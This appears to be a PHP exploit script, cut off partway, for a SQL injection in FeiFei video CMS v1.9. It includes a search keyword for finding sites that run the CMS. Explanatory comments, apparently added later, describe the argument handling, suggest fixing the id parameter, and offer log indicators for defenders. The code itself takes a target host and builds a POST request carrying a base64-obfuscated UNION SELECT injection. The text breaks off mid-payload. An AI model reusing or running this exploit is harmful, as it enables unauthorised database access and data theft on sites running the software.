/**
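* 飞飞影视管理系统 (FeiFei video CMS) SQL injection
* 飞飞影视系统PHP版 v1.9 (FeiFei video system, PHP edition, v1.9) injection exploit
* Affected input, as far as this listing shows: the id segment of the
* "?s=vod-read-id-<id>" route. On the application side that value should be
* handled as an integer or bound as a query parameter.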
* by:www.08sec.com fans
* keyword “Powered by www.ff84.com”
*/
// Runtime setup for a command-line script: report only fatal run-time errors
// and remove the execution time limit (0 means no limit).
error_reporting(E_ERROR);
set_time_limit(0);
// Argument check: with fewer than two arguments after the script name
// ($argc < 3) the usage text is printed and the script stops. The two expected
// arguments are a host (IP or hostname, without the "http://" scheme) and the
// path at which the CMS is installed.
if ($argc<3) {
print_r(‘
——————————————————
Usage: php ‘.$argv[0].’ host path
host: target server (ip/hostname),without”http://”
path: path to ff84cms
Example:
php ‘.$argv[0].’ localhost /
——————————————————-
‘);
// Nothing after this block runs unless both arguments were supplied.
die;
}
// Host and path are taken directly from the command line; nothing visible
// here validates or normalises them.
$host=$argv[1];
$path=$argv[2];
// Initialised empty; where these are filled in is not visible in this part of
// the listing.
$html=”;
$cookie=””;
// A fixed User-Agent header line (the string starts with a space). Presumably
// it is sent with the request built after this block; the sending code is not
// visible here, so confirm. For defenders, a constant value like this is only
// a weak log indicator: it matches unmodified copies of the script and nothing
// else. Requests to the "vod-read-id-" route whose id is not purely numeric
// are the more durable signal.
$agent=” User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1″;
// Initialised empty; its later use is not visible in this part of the listing.
$content =””;
$data = “POST /?s=vod-read-id-1″.base64_decode(‘JTIwYW5kJTIwMT0yJTIwdW5pb24lMjBzZWxlY3QlMjAxLDIsMyw0LDUsNiw3LDgsOSwxMCwxMSwxMiwxMywxNCwxN